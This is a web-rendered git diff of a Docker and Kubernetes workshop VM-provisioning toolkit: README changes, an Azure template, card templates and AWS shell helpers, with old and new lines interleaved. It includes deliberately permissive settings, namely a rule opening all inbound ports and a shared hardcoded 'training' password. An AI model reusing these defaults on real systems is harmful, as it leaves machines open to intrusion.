required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
name: consul-node4
annotations:
node: node4
spec:
capacity:
storage: 10Gi
accessModes:
- ReadWriteOnce
persistentVolumeReclaimPolicy: Delete
local:
path: /mnt/consul
nodeAffinity:
required:
nodeSelectorTerms:
- matchExpressions:
- key: kubernetes.io/hostname
operator: In
values:
- node4

View File

@@ -7,8 +7,8 @@ workshop.
## 1. Prerequisites
Virtualbox, Vagrant and Ansible
Virtualbox, Vagrant and Ansible
- Virtualbox: https://www.virtualbox.org/wiki/Downloads
@@ -25,20 +25,19 @@ Virtualbox, Vagrant and Ansible
$ git clone --recursive https://github.com/ansible/ansible.git
$ cd ansible
$ git checkout stable-{{ getStableVersionFromAnsibleProject }}
$ git checkout stable-2.0.0.1
$ git submodule update
- source the setup script to make Ansible available on this terminal session:
$ source path/to/your-ansible-clone/hacking/env-setup
- you need to repeat the last step every time you open a new terminal session
- you need to repeat the last step everytime you open a new terminal session
and want to use any Ansible command (but you'll probably only need to run
it once).
## 2. Preparing the environment
Change into directory that has your Vagrantfile
Run the following commands:
@@ -67,14 +66,6 @@ will reflect inside the instance.
- Depending on the Vagrant version, `sudo apt-get install bsdtar` may be needed
- If you get an error like "no Vagrant file found" or you have a file but "cannot open base box" when running `vagrant up`,
chances are good you not in the correct directory.
Make sure you are in sub directory named "prepare-local". It has all the config files required by ansible, vagrant and virtualbox
- If you are using Python 3.7, running the ansible-playbook provisioning, see an error like "SyntaxError: invalid syntax" and it mentions
the word "async", you need to upgrade your Ansible version to 2.6 or higher to resolve the keyword conflict.
https://github.com/ansible/ansible/issues/42105
- If you get strange Ansible errors about dependencies, try to check your pip
version with `pip --version`. The current version is 8.1.1. If your pip is
older than this, upgrade it with `sudo pip install --upgrade pip`, restart

View File

@@ -1,53 +1,26 @@
# Trainer tools to create and prepare VMs for Docker workshops
These tools can help you to create VMs on:
- Azure
- EC2
- OpenStack
# Trainer tools to create and prepare VMs for Docker workshops on AWS
## Prerequisites
- [Docker](https://docs.docker.com/engine/installation/)
- [Docker Compose](https://docs.docker.com/compose/install/)
- [Parallel SSH](https://code.google.com/archive/p/parallel-ssh/) (on a Mac: `brew install pssh`)
Depending on the infrastructure that you want to use, you also need to install
the Azure CLI, the AWS CLI, or terraform (for OpenStack deployment).
And if you want to generate printable cards:
- [pyyaml](https://pypi.python.org/pypi/PyYAML)
- [jinja2](https://pypi.python.org/pypi/Jinja2)
You can install them with pip (perhaps with `pip install --user`, or even use `virtualenv` if that's your thing).
These require Python 3. If you are on a Mac, see below for specific instructions on setting up
Python 3 to be the default Python on a Mac. In particular, if you installed `mosh`, Homebrew
may have changed your default Python to Python 2.
## General Workflow
- fork/clone repo
- create an infrastructure configuration in the `prepare-vms/infra` directory
(using one of the example files in that directory)
- set required environment variables for AWS
- create your own setting file from `settings/example.yaml`
- if necessary, increase allowed open files: `ulimit -Sn 10000`
- run `./workshopctl start` to create instances
- run `./workshopctl deploy` to install Docker and setup environment
- run `./workshopctl kube` (if you want to install and setup Kubernetes)
- run `./workshopctl cards` (if you want to generate PDF for printing handouts of each users host IP's and login info)
- run `./workshopctl stop` at the end of the workshop to terminate instances
- run `./workshopctl` commands to create instances, install docker, setup each users environment in node1, other management tasks
- run `./workshopctl cards` command to generate PDF for printing handouts of each users host IP's and login info
## Clone/Fork the Repo, and Build the Tools Image
The Docker Compose file here is used to build a image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).
$ git clone https://github.com/jpetazzo/container.training
$ cd container.training/prepare-vms
$ git clone https://github.com/jpetazzo/orchestration-workshop.git
$ cd orchestration-workshop/prepare-vms
$ docker-compose build
## Preparing to Run `./workshopctl`
### Required AWS Permissions/Info
@@ -56,74 +29,40 @@ The Docker Compose file here is used to build a image with all the dependencies
- Using a non-default VPC or Security Group isn't supported out of box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will assign the default VPC Security Group, which does not open any ports from Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg` which opens up all ports.
### Create your `infra` file
### Required Environment Variables
You need to do this only once. (On AWS, you can create one `infra`
file per region.)
- `AWS_ACCESS_KEY_ID`
- `AWS_SECRET_ACCESS_KEY`
- `AWS_DEFAULT_REGION`
Make a copy of one of the example files in the `infra` directory.
### Update/copy `settings/example.yaml`
For instance:
Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `./workshopctl deploy`, `./workshopctl cards`, etc.
```bash
cp infra/example.aws infra/aws-us-west-2
```
Edit your infrastructure file to customize it.
You will probably need to put your cloud provider credentials,
select region...
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS you can ignore this.
### Create your `settings` file
Similarly, pick one of the files in `settings` and copy it
to customize it.
For instance:
```bash
cp settings/example.yaml settings/myworkshop.yaml
```
You're all set!
./workshopctl cards 2016-09-28-00-33-bret settings/orchestration.yaml
## `./workshopctl` Usage
```
workshopctl - the orchestration workshop swiss army knife
Commands:
build Build the Docker image to run this program in a container
cards Generate ready-to-print cards for a group of VMs
deploy Install Docker on a bunch of running VMs
disableaddrchecks Disable source/destination IP address checks
disabledocker Stop Docker Engine and don't restart it automatically
helmprom Install Helm and Prometheus
help Show available commands
ids (FIXME) List the instance IDs belonging to a given tag or token
kubebins Install Kubernetes and CNI binaries but don't start anything
kubereset Wipe out Kubernetes configuration on all nodes
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
kubetest Check that all nodes are reporting as Ready
listall List VMs running on all configured infrastructures
list List available groups for a given infrastructure
netfix Disable GRO and run a pinger job on the VMs
opensg Open the default security group to ALL ingress traffic
ping Ping VMs in a given tag, to check that they have network access
pssh Run an arbitrary command on all nodes
pull_images Pre-pull a bunch of Docker images
quotas Check our infrastructure quotas (max instances)
remap_nodeports Remap NodePort range to 10000-10999
retag (FIXME) Apply a new tag to a group of VMs
ssh Open an SSH session to the first node of a tag
start Start a group of VMs
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
tags List groups of VMs known locally
test Run tests (pre-flight checks) on a group of VMs
weavetest Check that weave seems properly setup
webssh Install a WEB SSH server on the machines (port 1080)
wrap Run this program in a container
www Run a web server to access card HTML and PDF
ami Show the AMI that will be used for deployment
amis List Ubuntu AMIs in the current region
cards Generate ready-to-print cards for a batch of VMs
deploy Install Docker on a bunch of running VMs
ec2quotas Check our EC2 quotas (max instances)
help Show available commands
ids List the instance IDs belonging to a given tag or token
ips List the IP addresses of the VMs for a given tag or token
kube Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
list List available batches in the current region
opensg Open the default security group to ALL ingress traffic
pull_images Pre-pull a bunch of Docker images
retag Apply a new tag to a batch of VMs
start Start a batch of VMs
status List instance status for a given batch
stop Stop (terminate, shutdown, kill, remove, destroy...) instances
test Run tests (pre-flight checks) on a batch of VMs
```
### Summary of What `./workshopctl` Does For You
@@ -134,78 +73,35 @@ www Run a web server to access card HTML and PDF
- The `./workshopctl` script can be executed directly.
- It will run locally if all its dependencies are fulfilled; otherwise it will run in the Docker container you created with `docker-compose build` (preparevms_prepare-vms).
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. This can be configured with the `docker_user_password` property in the settings file.
- During `deploy` it will create the `docker` user with password `training`, which is printing on the cards for students. For now, this is hard coded.
### Example Steps to Launch a group of AWS Instances for a Workshop
### Example Steps to Launch a Batch of Instances for a Workshop
- Run `./workshopctl start --infra infra/aws-us-east-2 --settings/myworkshop.yaml --count 60` to create 60 EC2 instances
- Run `./workshopctl start N` Creates `N` EC2 instances
- Your local SSH key will be synced to instances under `ubuntu` user
- AWS instances will be created and tagged based on date, and IP's stored in `prepare-vms/tags/`
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
- Run `./workshopctl deploy TAG settings/somefile.yaml` to run `scripts/postprep.rc` via parallel-ssh
- If it errors or times out, you should be able to rerun
- Requires good connection to run all the parallel SSH connections, up to 100 parallel (ProTip: create dedicated management instance in same AWS region where you run all these utils from)
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG` generates PDF/HTML files to print and cut and hand out to students
- Run `./workshopctl pull-images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG settings/somefile.yaml` generates PDF/HTML files to print and cut and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.
### Example Steps to Launch Azure Instances
## Other Tools
- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
- Customize `azuredeploy.parameters.json`
- Required:
- Provide the SSH public key you plan to use for instance configuration
- Optional:
- Choose a name for the workshop (default is "workshop")
- Choose the number of instances (default is 3)
- Customize the desired instance size (default is Standard_D1_v2)
- Launch instances with your chosen resource group name and your preferred region; the examples are "workshop" and "eastus":
```
az group create --name workshop --location eastus
az group deployment create --resource-group workshop --template-file azuredeploy.json --parameters @azuredeploy.parameters.json
```
### Deploying your SSH key to all the machines
The `az group deployment create` command can take several minutes and will only say `- Running ..` until it completes, unless you increase the verbosity with `--verbose` or `--debug`.
- Make sure that you have SSH keys loaded (`ssh-add -l`).
- Source `rc`.
- Run `pcopykey`.
To display the IPs of the instances you've launched:
```
az vm list-ip-addresses --resource-group workshop --output table
```
### Installing extra packages
If you want to put the IPs into `prepare-vms/tags/<tag>/ips.txt` for a tag of "myworkshop":
1) If you haven't yet installed `jq` and/or created your event's tags directory in `prepare-vms`:
```
brew install jq
mkdir -p tags/myworkshop
```
2) And then generate the IP list:
```
az vm list-ip-addresses --resource-group workshop --output json | jq -r '.[].virtualMachine.network.publicIpAddresses[].ipAddress' > tags/myworkshop/ips.txt
```
After the workshop is over, remove the instances:
```
az group delete --resource-group workshop
```
### Example Steps to Configure Instances from a non-AWS Source
- Copy `infra/example.generic` to `infra/generic`
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
- Edit the file `prepare-vms/tags/TAG/ips.txt`, it should list the IP addresses of the VMs (one per line, without any comments or other info)
- Continue deployment of cluster configuration with `./workshopctl deploy TAG`
- Optionally, configure Kubernetes clusters of the size in the settings: workshopctl kube `TAG`
- Optionally, test your Kubernetes clusters. They may take a little time to become ready: workshopctl kubetest `TAG`
- Generate cards to print and hand out: workshopctl cards `TAG`
- Print the cards file: prepare-vms/tags/`TAG`/ips.html
- Source `postprep.rc`.
(This will install a few extra packages, add entries to
/etc/hosts, generate SSH keys, and deploy them on all hosts.)
## Even More Details
@@ -218,7 +114,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.
#### Instance + tag creation
The VMs will be started, with an automatically generated tag (timestamp + your username).
10 VMs will be started, with an automatically generated tag (timestamp + your username).
Your SSH key will be added to the `authorized_keys` of the ubuntu user.
@@ -226,33 +122,35 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.
Following the creation of the VMs, a text file will be created containing a list of their IPs.
This ips.txt file will be created in the $TAG/ directory and a symlink will be placed in the working directory of the script.
If you create new VMs, the symlinked file will be overwritten.
#### Deployment
Instances can be deployed manually using the `deploy` command:
$ ./workshopctl deploy TAG
$ ./workshopctl deploy TAG settings/somefile.yaml
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.
The `postprep.rc` file will be copied via parallel-ssh to all of the VMs and executed.
#### Pre-pull images
$ ./workshopctl pull_images TAG
$ ./workshopctl pull-images TAG
#### Generate cards
$ ./workshopctl cards TAG
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.
If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency. If you plan to just print the HTML cards, you can ignore this.
$ ./workshopctl cards TAG settings/somefile.yaml
#### List tags
$ ./workshopctl list infra/some-infra-file
$ ./workshopctl list
$ ./workshopctl listall
#### List VMs
$ ./workshopctl tags
$ ./workshopctl list TAG
This will print a human-friendly list containing some information about each instance.
#### Stop and destroy VMs
@@ -262,32 +160,3 @@ If you don't have `wkhtmltopdf` installed, you will get a warning that it is a m
- Don't write to bash history in system() in postprep
- compose, etc version inconsistent (int vs str)
## Making sure Python3 is the default (Mac only)
Check the `/usr/local/bin/python` symlink. It should be pointing to
`/usr/local/Cellar/python/3`-something. If it isn't, follow these
instructions.
1) Verify that Python 3 is installed.
```
ls -la /usr/local/Cellar/Python
```
You should see one or more versions of Python 3. If you don't,
install it with `brew install python`.
2) Verify that `python` points to Python3.
```
ls -la /usr/local/bin/python
```
If this points to `/usr/local/Cellar/python@2`, then we'll need to change it.
```
rm /usr/local/bin/python
ln -s /usr/local/Cellar/Python/xxxx /usr/local/bin/python
# where xxxx is the most recent Python 3 version you saw above
```

View File

@@ -1,250 +0,0 @@
{
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workshopName": {
"type": "string",
"defaultValue": "workshop",
"metadata": {
"description": "Workshop name."
}
},
"vmPrefix": {
"type": "string",
"defaultValue": "node",
"metadata": {
"description": "Prefix for VM names."
}
},
"numberOfInstances": {
"type": "int",
"defaultValue": 3,
"metadata": {
"description": "Number of VMs to create."
}
},
"adminUsername": {
"type": "string",
"defaultValue": "ubuntu",
"metadata": {
"description": "Admin username for VMs."
}
},
"sshKeyData": {
"type": "string",
"defaultValue": "",
"metadata": {
"description": "SSH rsa public key file as a string."
}
},
"imagePublisher": {
"type": "string",
"defaultValue": "Canonical",
"metadata": {
"description": "OS image publisher; default Canonical."
}
},
"imageOffer": {
"type": "string",
"defaultValue": "UbuntuServer",
"metadata": {
"description": "The name of the image offer. The default is Ubuntu"
}
},
"imageSKU": {
"type": "string",
"defaultValue": "16.04-LTS",
"metadata": {
"description": "Version of the image. The default is 16.04-LTS"
}
},
"vmSize": {
"type": "string",
"defaultValue": "Standard_D1_v2",
"metadata": {
"description": "VM Size."
}
}
},
"variables": {
"vnetID": "[resourceId('Microsoft.Network/virtualNetworks',variables('virtualNetworkName'))]",
"subnet1Ref": "[concat(variables('vnetID'),'/subnets/',variables('subnet1Name'))]",
"vmName": "[parameters('vmPrefix')]",
"sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
"publicIPAddressName": "PublicIP",
"publicIPAddressType": "Dynamic",
"virtualNetworkName": "MyVNET",
"netSecurityGroup": "MyNSG",
"addressPrefix": "10.0.0.0/16",
"subnet1Name": "subnet-1",
"subnet1Prefix": "10.0.0.0/24",
"nicName": "myVMNic"
},
"resources": [
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/publicIPAddresses",
"name": "[concat(variables('publicIPAddressName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "publicIPLoop",
"count": "[parameters('numberOfInstances')]"
},
"properties": {
"publicIPAllocationMethod": "[variables('publicIPAddressType')]"
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/virtualNetworks",
"name": "[variables('virtualNetworkName')]",
"location": "[resourceGroup().location]",
"dependsOn": [
"[concat('Microsoft.Network/networkSecurityGroups/', variables('netSecurityGroup'))]"
],
"properties": {
"addressSpace": {
"addressPrefixes": [
"[variables('addressPrefix')]"
]
},
"subnets": [
{
"name": "[variables('subnet1Name')]",
"properties": {
"addressPrefix": "[variables('subnet1Prefix')]",
"networkSecurityGroup": {
"id": "[resourceId('Microsoft.Network/networkSecurityGroups', variables('netSecurityGroup'))]"
}
}
}
]
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/networkInterfaces",
"name": "[concat(variables('nicName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "nicLoop",
"count": "[parameters('numberOfInstances')]"
},
"dependsOn": [
"[concat('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'),copyIndex(1))]",
"[concat('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]"
],
"properties": {
"ipConfigurations": [
{
"name": "ipconfig1",
"properties": {
"privateIPAllocationMethod": "Dynamic",
"publicIPAddress": {
"id": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'), copyIndex(1)))]"
},
"subnet": {
"id": "[variables('subnet1Ref')]"
}
}
}
]
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-12-01",
"type": "Microsoft.Compute/virtualMachines",
"name": "[concat(variables('vmName'),copyIndex(1))]",
"location": "[resourceGroup().location]",
"copy": {
"name": "vmLoop",
"count": "[parameters('numberOfInstances')]"
},
"dependsOn": [
"[concat('Microsoft.Network/networkInterfaces/', variables('nicName'), copyIndex(1))]"
],
"properties": {
"hardwareProfile": {
"vmSize": "[parameters('vmSize')]"
},
"osProfile": {
"computerName": "[concat(variables('vmName'),copyIndex(1))]",
"adminUsername": "[parameters('adminUsername')]",
"linuxConfiguration": {
"disablePasswordAuthentication": true,
"ssh": {
"publicKeys": [
{
"path": "[variables('sshKeyPath')]",
"keyData": "[parameters('sshKeyData')]"
}
]
}
}
},
"storageProfile": {
"osDisk": {
"createOption": "FromImage"
},
"imageReference": {
"publisher": "[parameters('imagePublisher')]",
"offer": "[parameters('imageOffer')]",
"sku": "[parameters('imageSKU')]",
"version": "latest"
}
},
"networkProfile": {
"networkInterfaces": [
{
"id": "[resourceId('Microsoft.Network/networkInterfaces', concat(variables('nicName'),copyIndex(1)))]"
}
]
}
},
"tags": {
"workshop": "[parameters('workshopName')]"
}
},
{
"apiVersion": "2017-11-01",
"type": "Microsoft.Network/networkSecurityGroups",
"name": "[variables('netSecurityGroup')]",
"location": "[resourceGroup().location]",
"tags": {
"workshop": "[parameters('workshopName')]"
},
"properties": {
"securityRules": [
{
"name": "default-open-ports",
"properties": {
"protocol": "Tcp",
"sourcePortRange": "*",
"destinationPortRange": "*",
"sourceAddressPrefix": "*",
"destinationAddressPrefix": "*",
"access": "Allow",
"priority": 1000,
"direction": "Inbound"
}
}
]
}
}
],
"outputs": {
"resourceID": {
"type": "string",
"value": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'),'1'))]"
}
}
}

View File

@@ -1,18 +0,0 @@
{
"$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"sshKeyData": {
"value": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXTIl/M9oeSlcsC5Rfe+nZr4Jc4sl200pSw2lpdxlZ3xzeP15NgSSMJnigUrKUXHfqRQ+2wiPxEf0Odz2GdvmXvR0xodayoOQsO24AoERjeSBXCwqITsfp1bGKzMb30/3ojRBo6LBR6r1+lzJYnNCGkT+IQwLzRIpm0LCNz1j08PUI2aZ04+mcDANvHuN/hwi/THbLLp6SNWN43m9r02RcC6xlCNEhJi4wk4VzMzVbSv9RlLGST2ocbUHwmQ2k9OUmpzoOx73aQi9XNnEaFh2w/eIdXM75VtkT3mRryyykg9y0/hH8/MVmIuRIdzxHQqlm++DLXVH5Ctw6a4kS+ki7 workshop"
},
"workshopName": {
"value": "workshop"
},
"numberOfInstances": {
"value": 3
},
"vmSize": {
"value": "Standard_D1_v2"
}
}
}

106
prepare-vms/cards.html Normal file
View File

@@ -0,0 +1,106 @@
{# Feel free to customize or override anything in there! #}
{%- set url = "http://container.training/" -%}
{%- set pagesize = 12 -%}
{%- if clustersize == 1 -%}
{%- set workshop_name = "Docker workshop" -%}
{%- set cluster_or_machine = "machine" -%}
{%- set this_or_each = "this" -%}
{%- set machine_is_or_machines_are = "machine is" -%}
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
{%- else -%}
{%- set workshop_name = "orchestration workshop" -%}
{%- set cluster_or_machine = "cluster" -%}
{%- set this_or_each = "each" -%}
{%- set machine_is_or_machines_are = "machines are" -%}
{%- set image_src_swarm = "https://cdn.wp.nginx.com/wp-content/uploads/2016/07/docker-swarm-hero2.png" -%}
{%- set image_src_kube = "https://avatars1.githubusercontent.com/u/13629408" -%}
{%- set image_src = image_src_swarm -%}
{%- endif -%}
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><style>
body, table {
margin: 0;
padding: 0;
line-height: 1em;
font-size: 14px;
}
table {
border-spacing: 0;
margin-top: 0.4em;
margin-bottom: 0.4em;
border-left: 0.8em double grey;
padding-left: 0.4em;
}
div {
float: left;
border: 1px dotted black;
padding-top: 1%;
padding-bottom: 1%;
/* columns * (width+left+right) < 100% */
width: 21.5%;
padding-left: 1.5%;
padding-right: 1.5%;
}
p {
margin: 0.4em 0 0.4em 0;
}
img {
height: 4em;
float: right;
margin-right: -0.4em;
}
.logpass {
font-family: monospace;
font-weight: bold;
}
.pagebreak {
page-break-after: always;
clear: both;
display: block;
height: 8px;
}
</style></head>
<body>
{% for cluster in clusters %}
{% if loop.index0>0 and loop.index0%pagesize==0 %}
<span class="pagebreak"></span>
{% endif %}
<div>
<p>
Here is the connection information to your very own
{{ cluster_or_machine }} for this {{ workshop_name }}.
You can connect to {{ this_or_each }} VM with any SSH client.
</p>
<p>
<img src="{{ image_src }}" />
<table>
<tr><td>login:</td></tr>
<tr><td class="logpass">docker</td></tr>
<tr><td>password:</td></tr>
<tr><td class="logpass">training</td></tr>
</table>
</p>
<p>
Your {{ machine_is_or_machines_are }}:
<table>
{% for node in cluster %}
<tr><td>node{{ loop.index }}:</td><td>{{ node }}</td></tr>
{% endfor %}
</table>
</p>
<p>You can find the slides at:
<center>{{ url }}</center>
</p>
</div>
{% endfor %}
</body>
</html>

View File

Can't render this file because it contains an unexpected character in line 1 and column 42.

View File

@@ -7,6 +7,15 @@ fi
if id docker; then
sudo userdel -r docker
fi
sudo apt-get update -q
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
pip install --user awscli jinja2 pdfkit pssh
pip install --user awscli jinja2 pdfkit
sudo apt-get install -y wkhtmltopdf xvfb
tmux new-session \; send-keys "
[ -f ~/.ssh/id_rsa ] || ssh-keygen
eval \$(ssh-agent)
ssh-add
Xvfb :0 &
export DISPLAY=:0
mkdir -p ~/www
sudo docker run -d -p 80:80 -v \$HOME/www:/usr/share/nginx/html nginx
"

View File

@@ -7,6 +7,7 @@ services:
working_dir: /root/prepare-vms
volumes:
- $HOME/.aws/:/root/.aws/
- /etc/localtime:/etc/localtime:ro
- $SSH_AUTH_SOCK:$SSH_AUTH_SOCK
- $PWD/:/root/prepare-vms/
environment:
@@ -14,6 +15,5 @@ services:
AWS_ACCESS_KEY_ID: ${AWS_ACCESS_KEY_ID}
AWS_SECRET_ACCESS_KEY: ${AWS_SECRET_ACCESS_KEY}
AWS_DEFAULT_REGION: ${AWS_DEFAULT_REGION}
AWS_INSTANCE_TYPE: ${AWS_INSTANCE_TYPE}
USER: ${USER}
entrypoint: /root/prepare-vms/workshopctl

View File

@@ -1,10 +0,0 @@
#!/bin/sh
set -e
TAG=$(./workshopctl maketag)
./workshopctl start --settings settings/jerome.yaml --infra infra/aws-eu-central-1 --tag $TAG
./workshopctl deploy $TAG
./workshopctl kube $TAG
./workshopctl helmprom $TAG
while ! ./workshopctl kubetest $TAG; do sleep 1; done
./workshopctl tmux $TAG
echo ./workshopctl stop $TAG

View File

@@ -1,6 +0,0 @@
INFRACLASS=aws
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
# and customize the variables below.
export AWS_DEFAULT_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...

View File

@@ -1,2 +0,0 @@
INFRACLASS=generic
# This is for manual provisioning. No other variable or configuration is needed.

View File

@@ -1,9 +0,0 @@
INFRACLASS=openstack
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
# and customize the variables below.
export TF_VAR_user="jpetazzo"
export TF_VAR_tenant="training"
export TF_VAR_domain="Default"
export TF_VAR_password="..."
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
export TF_VAR_flavor="GP1.S"

105
prepare-vms/lib/aws.sh Normal file
View File

@@ -0,0 +1,105 @@
aws_display_tags() {
# Print all "Name" tags in our region with their instance count
echo "[#] [Status] [Token] [Tag]" \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
aws ec2 describe-instances \
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
| tr -d "\r" \
| uniq -c \
| sort -k 3 \
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
}
aws_get_tokens() {
aws ec2 describe-instances --output text \
--query 'Reservations[*].Instances[*].[ClientToken]' \
| sort -u
}
aws_display_instance_statuses_by_tag() {
TAG=$1
need_tag $TAG
IDS=$(aws ec2 describe-instances \
--filters "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
aws ec2 describe-instance-status \
--instance-ids $IDS \
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
--output table
}
aws_display_instances_by_tag() {
TAG=$1
need_tag $TAG
result=$(aws ec2 describe-instances --output table \
--filter "Name=tag:Name,Values=$TAG" \
--query "Reservations[*].Instances[*].[ \
InstanceId, \
State.Name, \
Tags[0].Value, \
PublicIpAddress, \
InstanceType \
]"
)
if [[ -z $result ]]; then
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
else
echo "$result"
fi
}
aws_get_instance_ids_by_filter() {
FILTER=$1
aws ec2 describe-instances --filters $FILTER \
--query Reservations[*].Instances[*].InstanceId \
--output text | tr "\t" "\n" | tr -d "\r"
}
aws_get_instance_ids_by_client_token() {
TOKEN=$1
need_tag $TOKEN
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
}
aws_get_instance_ids_by_tag() {
TAG=$1
need_tag $TAG
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
}
aws_get_instance_ips_by_tag() {
TAG=$1
need_tag $TAG
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
--output text \
--query "Reservations[*].Instances[*].PublicIpAddress" \
| tr "\t" "\n" \
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
}
aws_kill_instances_by_tag() {
TAG=$1
need_tag $TAG
IDS=$(aws_get_instance_ids_by_tag $TAG)
if [ -z "$IDS" ]; then
die "Invalid tag."
fi
info "Deleting instances with tag $TAG."
aws ec2 terminate-instances --instance-ids $IDS \
| grep ^TERMINATINGINSTANCES
info "Deleted instances with tag $TAG."
}
aws_tag_instances() {
OLD_TAG_OR_TOKEN=$1
NEW_TAG=$2
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
}

View File

@@ -2,7 +2,7 @@
_ERR() {
error "Command $BASH_COMMAND failed (exit status: $?)"
}
set -eE
set -e
trap _ERR ERR
die() {
@@ -50,41 +50,27 @@ sep() {
fi
}
need_infra() {
if [ -z "$1" ]; then
die "Please specify infrastructure file. (e.g.: infra/aws)"
fi
if [ "$1" = "--infra" ]; then
die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
fi
if [ ! -f "$1" ]; then
die "Infrastructure file $1 doesn't exist."
fi
. "$1"
. "lib/infra/$INFRACLASS.sh"
}
need_tag() {
if [ -z "$TAG" ]; then
if [ -z "$1" ]; then
die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
fi
if [ ! -d "tags/$TAG" ]; then
die "Tag $TAG not found (directory tags/$TAG does not exist)."
fi
for FILE in settings.yaml ips.txt infra.sh; do
if [ ! -f "tags/$TAG/$FILE" ]; then
warning "File tags/$TAG/$FILE not found."
fi
done
. "tags/$TAG/infra.sh"
. "lib/infra/$INFRACLASS.sh"
}
need_settings() {
if [ -z "$1" ]; then
die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
fi
if [ ! -f "$1" ]; then
die "Please specify a settings file."
elif [ ! -f "$1" ]; then
die "Settings file $1 doesn't exist."
fi
}
need_ips_file() {
IPS_FILE=$1
if [ -z "$IPS_FILE" ]; then
die "IPS_FILE not set."
fi
if [ ! -s "$IPS_FILE" ]; then
die "IPS_FILE $IPS_FILE not found. Please run: $0 ips <TAG>"
fi
}

View File

@@ -2,16 +2,26 @@ export AWS_DEFAULT_OUTPUT=text
HELP=""
_cmd() {
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
HELP="$(printf "%s\n%-12s %s\n" "$HELP" "$1" "$2")"
}
_cmd help "Show available commands"
_cmd_help() {
printf "$(basename $0) - the container training swiss army knife\n"
printf "$(basename $0) - the orchestration workshop swiss army knife\n"
printf "Commands:"
printf "%s" "$HELP" | sort
}
_cmd amis "List Ubuntu AMIs in the current region"
_cmd_amis() {
